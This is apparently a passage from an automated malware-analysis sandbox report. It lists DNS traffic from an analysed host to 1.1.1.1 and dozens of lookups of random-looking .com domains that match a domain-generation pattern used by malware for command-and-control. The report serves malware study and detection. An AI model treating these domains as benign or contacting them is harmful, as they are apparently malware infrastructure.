                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.320492983 CET6143753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321589947 CET5390253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.321742058 CET6353953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322115898 CET5509953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322369099 CET5296653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322585106 CET5213453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.322808981 CET5354353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.323040009 CET5057953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.325406075 CET53515261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.329916954 CET53637871.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.330336094 CET5008353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.331159115 CET53521311.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.331248999 CET5061653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.333208084 CET53505791.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.334003925 CET53535431.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.341411114 CET53500831.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.342077017 CET5516153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.351772070 CET6389653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.351914883 CET53614371.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.352181911 CET53551611.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.352204084 CET53539021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.353286982 CET53635391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.353862047 CET53550991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.354011059 CET53529661.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.354192019 CET53521341.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.356265068 CET5452253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.362282991 CET53638961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.362297058 CET53506161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.366257906 CET53545221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367012978 CET6411053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367635012 CET6120153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367661953 CET6504453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.367980003 CET6307153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368146896 CET5802453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368264914 CET5197053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368479967 CET5815053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.368987083 CET5027053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371277094 CET6304553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.371550083 CET5623953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.372395992 CET5554053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.374083996 CET53650441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.377358913 CET53612011.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.377372026 CET53630711.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.377726078 CET53641101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.378938913 CET53580241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.379055977 CET53581501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.379647970 CET53502701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.380916119 CET6410253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.381063938 CET5189253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.381083012 CET53630451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.382035971 CET53562391.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.382138014 CET53555401.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383220911 CET6418953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383456945 CET6170653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383521080 CET6339253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.383761883 CET5013053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.384449959 CET5631453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385081053 CET5826453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385760069 CET5238953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385926962 CET5007853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.391098022 CET53641021.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.392590046 CET53641891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.392750978 CET53501301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.393897057 CET53563141.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.394710064 CET53633921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.395245075 CET53617061.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.395493031 CET53523891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.396469116 CET53500781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.396886110 CET6282653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.399425983 CET53519701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400593042 CET6132253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400737047 CET5147753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400873899 CET5392353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401611090 CET5564553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401792049 CET5277253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402081013 CET5269653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402401924 CET5342453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402713060 CET5414653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402901888 CET5211253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.403043032 CET5973353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.407080889 CET53628261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.410708904 CET53527721.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.411163092 CET53613221.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.411652088 CET53514771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.411942005 CET53539231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.412120104 CET53556451.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.412328959 CET53534241.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.412390947 CET53526961.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.413194895 CET53518921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.413314104 CET53597331.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.415515900 CET53541461.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.415654898 CET53582641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.435003042 CET53521121.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733179092 CET5916353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733474016 CET6325053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733495951 CET6520753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733902931 CET4982153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.734031916 CET5007553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.740830898 CET53498211.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.743508101 CET53652071.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.743668079 CET53632501.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.743807077 CET53591631.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.765559912 CET53500751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.554846048 CET6237553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.556314945 CET5218953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.565934896 CET53623751.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566381931 CET5504153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566734076 CET5603553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.567681074 CET4921753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.571909904 CET5777853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573148012 CET6081353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573973894 CET5060453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.574670076 CET5241653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.574799061 CET53560351.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.576322079 CET53550411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.576915026 CET5847053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.577771902 CET5309953192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.578217983 CET6394253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.578874111 CET53492171.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.582288980 CET6529053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.583337069 CET53506041.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.585918903 CET6410553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.587908983 CET5946253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.588471889 CET53521891.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.588495016 CET53584701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.588505983 CET53639421.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.590115070 CET53577781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.591660976 CET5969753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.594923019 CET53652901.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.596271992 CET53641051.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.604646921 CET53608131.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.607870102 CET53524161.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.608505011 CET53530991.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.609992027 CET6011153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.610308886 CET4994153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.614151001 CET5077453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.620332956 CET53499411.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.622056007 CET6219253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.622865915 CET53596971.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.624078035 CET53594621.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.624377012 CET53507741.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.642112017 CET53601111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.654731989 CET53621921.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.801790953 CET5085553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802035093 CET6552353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802381992 CET5134853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802584887 CET6487353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804702044 CET6537753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804862022 CET5823053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804878950 CET5626853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805166960 CET6363053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805378914 CET6548253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805526972 CET6158553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805604935 CET5137053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805835962 CET5767853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806076050 CET6137753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806180954 CET6196053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806718111 CET5426553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.808319092 CET5521053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.811844110 CET53653771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.811995983 CET53655231.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.812401056 CET53508551.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.812939882 CET53513481.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814209938 CET53542651.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814979076 CET53562681.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.814990044 CET53582301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.815865993 CET53576781.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.816812038 CET53613771.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.817580938 CET53619601.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.818384886 CET53552101.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.828174114 CET53636301.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.834798098 CET53648731.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.836462021 CET53615851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.837321997 CET53513701.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.838077068 CET53654821.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.848514080 CET5698553192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853260994 CET6075653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853765965 CET4972653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.879749060 CET53569851.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.884919882 CET53607561.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.886008024 CET53497261.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.953929901 CET5138253192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.965037107 CET53513821.1.1.1192.168.2.6

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.739584923 CET192.168.2.61.1.1.10x55eaStandard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.740468025 CET192.168.2.61.1.1.10xed30Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.742535114 CET192.168.2.61.1.1.10xa42dStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.750818968 CET192.168.2.61.1.1.10x2bcaStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.755872011 CET192.168.2.61.1.1.10x7328Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.772382021 CET192.168.2.61.1.1.10xab0dStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.775114059 CET192.168.2.61.1.1.10xa0d8Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.789493084 CET192.168.2.61.1.1.10x2bdbStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.807275057 CET192.168.2.61.1.1.10xc00fStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.808139086 CET192.168.2.61.1.1.10x6851Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.823378086 CET192.168.2.61.1.1.10xb4a4Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.000561953 CET192.168.2.61.1.1.10xc82cStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.359999895 CET192.168.2.61.1.1.10x169bStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.360097885 CET192.168.2.61.1.1.10x824fStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.362373114 CET192.168.2.61.1.1.10xeee6Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365150928 CET192.168.2.61.1.1.10x9417Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365709066 CET192.168.2.61.1.1.10x8f45Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365735054 CET192.168.2.61.1.1.10xb466Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368521929 CET192.168.2.61.1.1.10xeb6eStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368657112 CET192.168.2.61.1.1.10x4576Standard query (0)vocyzit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.369975090 CET192.168.2.61.1.1.10x18a4Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.370503902 CET192.168.2.61.1.1.10x9584Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.371145964 CET192.168.2.61.1.1.10x258Standard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.371927977 CET192.168.2.61.1.1.10xef39Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.372406960 CET192.168.2.61.1.1.10xc5b7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.373025894 CET192.168.2.61.1.1.10x5eb1Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.380754948 CET192.168.2.61.1.1.10xe122Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381036043 CET192.168.2.61.1.1.10xe8e0Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381134033 CET192.168.2.61.1.1.10x21d8Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381264925 CET192.168.2.61.1.1.10x834aStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381477118 CET192.168.2.61.1.1.10xa556Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381747007 CET192.168.2.61.1.1.10xeb06Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.381918907 CET192.168.2.61.1.1.10xdebStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382102013 CET192.168.2.61.1.1.10xaf06Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.382304907 CET192.168.2.61.1.1.10x9ea8Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391613007 CET192.168.2.61.1.1.10x23e5Standard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391796112 CET192.168.2.61.1.1.10x706fStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391987085 CET192.168.2.61.1.1.10x122fStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392151117 CET192.168.2.61.1.1.10x84fStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.393465042 CET192.168.2.61.1.1.10x1d7fStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394359112 CET192.168.2.61.1.1.10xa03bStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394542933 CET192.168.2.61.1.1.10x9a06Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.394542933 CET192.168.2.61.1.1.10xf810Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.395817995 CET192.168.2.61.1.1.10x88c7Standard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.396060944 CET192.168.2.61.1.1.10xfec2Standard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.396348000 CET192.168.2.61.1.1.10x7a79Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.409426928 CET192.168.2.61.1.1.10xd6a0Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410202980 CET192.168.2.61.1.1.10x5c23Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410594940 CET192.168.2.61.1.1.10xb232Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.410768032 CET192.168.2.61.1.1.10x5611Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412308931 CET192.168.2.61.1.1.10xb7b6Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412559986 CET192.168.2.61.1.1.10xd82eStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413017988 CET192.168.2.61.1.1.10x627cStandard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413105965 CET192.168.2.61.1.1.10x60c7Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413279057 CET192.168.2.61.1.1.10xa468Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.413712978 CET192.168.2.61.1.1.10x99b8Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433278084 CET192.168.2.61.1.1.10x816cStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433336020 CET192.168.2.61.1.1.10x9780Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433917999 CET192.168.2.61.1.1.10xcef5Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433918953 CET192.168.2.61.1.1.10xc339Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434117079 CET192.168.2.61.1.1.10x6ee0Standard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434166908 CET192.168.2.61.1.1.10xf3cStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.434708118 CET192.168.2.61.1.1.10x5c4fStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
